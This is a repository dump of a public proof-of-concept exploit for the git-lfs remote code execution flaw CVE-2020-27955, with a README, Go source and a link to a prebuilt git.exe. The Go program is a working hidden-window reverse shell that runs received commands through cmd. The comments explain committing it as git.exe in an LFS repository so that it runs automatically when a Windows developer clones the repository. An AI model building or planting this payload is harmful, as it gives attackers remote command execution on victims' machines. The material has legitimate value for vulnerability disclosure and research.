├── README.md ├── git-lfs-RCE-exploit-CVE-2020-27955.go └── git.exe /README.md: -------------------------------------------------------------------------------- 1 | # Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (Go version) 2 | ## Vulnerable: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKraken etc. 3 | 4 | Discovered by **Dawid Golunski** 5 | * https://legalhackers.com 6 | * https://exploitbox.io 7 | 8 | Tested on Windows on: 9 | 10 | git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKraken etc. 11 | 12 | Basically, the whole Windows dev world ;) 13 | 14 | Check out the full advisories for details and patch information: 15 | 16 | * https://exploitbox.io/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955.html 17 | * https://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.html 18 | 19 | Video PoC: 20 | * https://youtu.be/tlptOf9w274 21 | 22 | There's also a BAT / Powershell version of this exploit in a repo with LFS enabled already: 23 | * https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955 24 | 25 | ``` 26 | 27 | .;lc' 28 | .,cdkkOOOko;. 29 | .,lxxkkkkOOOO000Ol' 30 | .':oxxxxxkkkkOOOO0000KK0x:' 31 | .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;. 32 | ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl. 33 | '';ldxxxxxdc,. ,oOXXXNNNXd;,. 34 | .ddc;,,:c;. ,c: .cxxc:;:ox: 35 | .dxxxxo, ., ,kMMM0:. ., .lxxxxx: 36 | .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx: 37 | .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx: 38 | .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx: 39 | .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx: 40 | .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx: 41 | .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx: 42 | .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx: 43 | .dxxxxxdl;. ., .. .;cdxxxxxx: 44 | .dxxxxxxxxxdc,. 'cdkkxxxxxxxx: 45 | .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,. 46 | .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:. 47 | .':oxxxxxxxxx.ckkkkkkkkxl,. 48 | .,cdxxxxx.ckkkkkxc. 49 | .':odx.ckxl,. 50 | .,.'. 51 | ``` 52 | 53 | https://exploitbox.io 54 | https://twitter.com/Exploit_Box 55 | 56 | 57 | Stay tuned 58 | 59 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /git-lfs-RCE-exploit-CVE-2020-27955.go: -------------------------------------------------------------------------------- 1 | /* 2 | Go PoC exploit for git-lfs - Remote Code Execution (RCE) vulnerability CVE-2020-27955 3 | git-lfs-RCE-exploit-CVE-2020-27955.go 4 | 5 | Discovered by Dawid Golunski 6 | https://legalhackers.com 7 | https://exploitbox.io 8 | 9 | 10 | Affected (RCE exploit): 11 | Git / GitHub CLI / GitHub Desktop / Visual Studio / GitKraken / SmartGit / SourceTree etc. 12 | Basically the whole Windows dev world which uses git. 13 | 14 | Usage: 15 | Compile: go build git-lfs-RCE-exploit-CVE-2020-27955.go 16 | Save & commit as git.exe 17 | 18 | The payload should get executed automatically on git clone operation. 19 | It spawns a reverse shell, or a calc.exe for testing (if it couldn't connect). 20 | 21 | An lfs-enabled repository with lfs files may also be needed so that git-lfs 22 | gets invoked. This can be achieved with: 23 | 24 | git lfs track "*.dat" 25 | echo "fat bug file" > lfsdata.dat 26 | git add .* 27 | git add * 28 | git commmit -m 'git-lfs exploit' -a 29 | 30 | Check out the full advisory for details: 31 | 32 | https://exploitbox.io/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955.html 33 | or the PoC video at: 34 | https://youtu.be/tlptOf9w274 35 | 36 | 37 | .;lc' 38 | .,cdkkOOOko;. 39 | .,lxxkkkkOOOO000Ol' 40 | .':oxxxxxkkkkOOOO0000KK0x:' 41 | .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;. 42 | ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl. 43 | '';ldxxxxxdc,. ,oOXXXNNNXd;,. 44 | .ddc;,,:c;. ,c: .cxxc:;:ox: 45 | .dxxxxo, ., ,kMMM0:. ., .lxxxxx: 46 | .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx: 47 | .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx: 48 | .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx: 49 | .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx: 50 | .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx: 51 | .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx: 52 | .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx: 53 | .dxxxxxdl;. ., .. .;cdxxxxxx: 54 | .dxxxxxxxxxdc,. 'cdkkxxxxxxxx: 55 | .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,. 56 | .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:. 57 | .':oxxxxxxxxx.ckkkkkkkkxl,. 58 | .,cdxxxxx.ckkkkkxc. 59 | .':odx.ckxl,. 60 | .,.'. 61 | 62 | https://ExploitBox.io 63 | 64 | https://twitter.com/Exploit_Box 65 | 66 | 67 | 68 | ** For testing purposes only ** 69 | 70 | 71 | */ 72 | 73 | package main 74 | import ( 75 | "net" 76 | "os/exec" 77 | "bufio" 78 | "syscall" 79 | ) 80 | 81 | 82 | func revsh(host string) { 83 | 84 | c, err := net.Dial("tcp", host) 85 | if nil != err { 86 | // Conn failed 87 | if nil != c { 88 | c.Close() 89 | } 90 | // Calc for testing purposes if no listener available 91 | cmd := exec.Command("calc") 92 | cmd.Run() 93 | return 94 | } 95 | 96 | r := bufio.NewReader(c) 97 | for { 98 | runcmd, err := r.ReadString('\n') 99 | if nil != err { 100 | c.Close() 101 | return 102 | } 103 | cmd := exec.Command("cmd", "/C", runcmd) 104 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 105 | out, _ := cmd.CombinedOutput() 106 | c.Write(out) 107 | } 108 | } 109 | 110 | // Connect to netcat listener on local port 1337 111 | func main() { 112 | revsh("localhost:1337") 113 | } 114 | 115 | -------------------------------------------------------------------------------- /git.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955-Go/4aa9cdea3b037982150fc3dcc2ad60914901cf96/git.exe --------------------------------------------------------------------------------